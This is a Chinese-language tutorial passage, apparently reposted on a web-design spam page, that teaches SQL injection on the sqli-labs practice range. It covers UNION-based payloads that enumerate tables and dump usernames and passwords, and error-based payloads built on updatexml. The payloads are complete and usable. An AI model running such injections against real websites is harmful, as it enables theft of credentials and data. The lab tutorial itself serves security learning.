当前位置：首页 > wzjs >正文

成都建站模板公司商洛做网站

wzjs 2025/9/19 5:45:02

成都建站模板公司,商洛做网站,WordPress全屏轮播图,wordpress 界面设计Sql注入的基本原理 SQL 注入（SQL Injection）是一种常见的网络攻击手段，发生在 Web 程序中数据库层的安全漏洞，是网站存在较多且较为简单的漏洞。主要原因是程序对用户输入数据的合法性没有进行判断和处理，使得攻击者能…

Sql注入的基本原理

SQL 注入（SQL Injection）是一种常见的网络攻击手段，发生在 Web 程序中数据库层的安全漏洞，是网站存在较多且较为简单的漏洞。主要原因是程序对用户输入数据的合法性没有进行判断和处理，使得攻击者能够在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句，在管理员不知情的情况下实现非法操作，如窃取敏感数据、绕过身份验证、修改或删除数据库内容、执行系统命令等。今天就来讲讲sql注入的常见过程。

本文仅仅是个人见解，如有问题，请各位师傅指出，某一定认真听教，修改。

本文使用sqli-labs靶场（以下简称靶场），让各位有更直观的了解。

特别提醒，本文仅限学习使用，一切造成的后果，皆有个人承担，与本人无关。

那么我们现在开始吧。

找到sql注入点。

这是sql注入的第一步。其实sql注入的注入点不仅限于url，其实所有可以输入内容的地方都有可能成为注入点。比如像输入账号密码的地方，这里就用靶场的第11关来做讲解。

可以看到是一个输入账号密码的地方，此时我们在账号处就可以sql注入

（此处是一个盲注，后面会讲）

其实sql注入点有很多，使用burpsuite抓包，

比如像user-agent，cookie等都有可能成为注入点，这就要求你有足够的耐心去尝试。

2.判断字符型注入还是数字型注入

这是sql注入必不缺少的一部，字符型和数字型为两个不同的注入和闭合方式，可以使用id=1’，如果不报错，就是字符型，否则为数字型。

3.尝试闭合方式

如果说找注入点很困难，那么使其闭合会更难，因为这就要求你会看源码，分析闭合方式。如果看不到源码，就要自己尝试。常见的闭合方式为（均为英文字符）：’（单引号），”(双引号)，’)（单引号加括号），”)（双引号加括号），等等多种方式，这里是字符型才要猜闭合，如果是数字型可以跳过这个步骤。在字符型闭合后，在后面加上-- +（中间有一个空格），可以将原本后面的代码注释掉。

4.判断sql注入方法

Sql注入有很多方法，主流的为sql的union（联合）注入，sql的盲注，盲注又分为布尔盲注和时间盲注，sql的报错注入等等。以下会详细讲讲这几种方法。

进行sql注入
1. 1union（联合）注入

联合注入主要使用的是union select 语句，这里使用靶场1来做演示

首先是闭合方式?id=1' -- +

页面回显正常，可以确定是闭合成功。

接下来使用order by

?id=1’order by 1 -- +

?id=1’order by 2 -- +

?id=1’order by 3 -- +

?id=1’order by 4 -- +

可以看到order by 4 时爆出没有4，此时我们知道存在3 列。

?id=-1’ union select 1,2,3 -- +(这里一定要改为-1或其他不存在的id)

此时我们知道在2和3存在注入点。我们可以在2和3处改为我们要查的东西，比如数据库：database（），版本：version()，用户：users（），等，这里主要是查数据库，

?id=-1’union select 1,database(),version() -- +

此时爆出了数据库名为security

接下来继续注入爆表名。

?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’ -- +

此时我们可以看到表名为emails，referers，uagents，users，接下来爆表名的具体目录名。(这里以users做演示)

?id=-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’-- +

爆出来了具体目录名。

最后就是查具体数据了。

?id=-1’union select 1,2,group_concat(id,username,password) from users -- +

爆出了数据库具体数据。在这里要稍微讲一下group_concat 这个函数，当数据过多时，可能会因为数据过长而报不出来，这里就要用select 配上limit来查看。

2 报错注入

这里使用的是靶场的第五关

首先这里使用联合注入发现不行

那么接下来就是用报错注入，核心原理就是执行错误的代码返回时就会带出敏感信息。那么接下来讲讲报错注入。

首先也是尝试闭合方式，字符型注入。

然后构造语句?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- +

成功爆出表名，这里讲一下，0x7e是~的16进制数，其实也可以用其他的，当然你也可以用“!”这样的方式来输入。

接下来就是爆表名。

?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),0x7e),1) -- +

R然后我们可以把limit 0，1 改为limit 1，1 查询第二张表，这里就不多演示了。

接下来爆列明，这里用emails做演示

?id=1 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- +